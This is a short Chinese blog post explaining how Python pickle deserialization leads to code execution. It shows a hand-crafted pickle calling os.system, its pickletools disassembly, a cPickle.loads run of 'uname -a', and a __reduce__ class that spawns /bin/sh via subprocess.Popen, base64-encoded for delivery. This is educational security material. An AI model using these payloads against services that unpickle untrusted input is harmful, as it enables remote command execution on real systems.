前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >python pickle 工作原理

python pickle 工作原理

作者头像
py3study
发布2020-01-06 13:26:35
1K0
发布2020-01-06 13:26:35
举报
文章被收录于专栏:python3python3

pickle

http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf

https://blog.nelhage.com/2011/03/exploiting-pickle/

https://lincolnloop.com/blog/playing-pickle-security/

>>> import pickletools >>> print pickletools.dis("cos\nsystem\n(S'ls ~'\ntR.")     0: c    GLOBAL     'os system'    11: (    MARK    12: S        STRING     'ls ~'    20: t        TUPLE      (MARK at 11)    21: R    REDUCE    22: .    STOP highest protocol among opcodes = 0 None

>>> import cPickle >>> cPickle.loads("cos\nsystem\n(S'uname -a'\ntR.") Linux RCM-RSAS-V6-Dev 3.9.0-aurora #4 SMP PREEMPT Fri Jun 7 14:50:52 CST 2013 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel GNU/Linux 0

构造简单的执行语句,当然也可以通过类的__reduce__方法,也就是说在执行pickle反序列化的时候会用到__reduce__方法

import cPickle
import subprocess
import base64

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

>>> class RunBinSh1(object): ...     def __reduce__(self): ...             return (subprocess.Popen, (('uname',),)) ... >>> print (cPickle.dumps(RunBinSh1())) csubprocess Popen p1 ((S'uname' tp2 tp3 Rp4 .

>>> print cPickle.loads((cPickle.dumps(RunBinSh1()))) <subprocess.Popen object at 0xb70cebac> >>> Linux

这样就能简单构造loads语句了

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-09-18 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档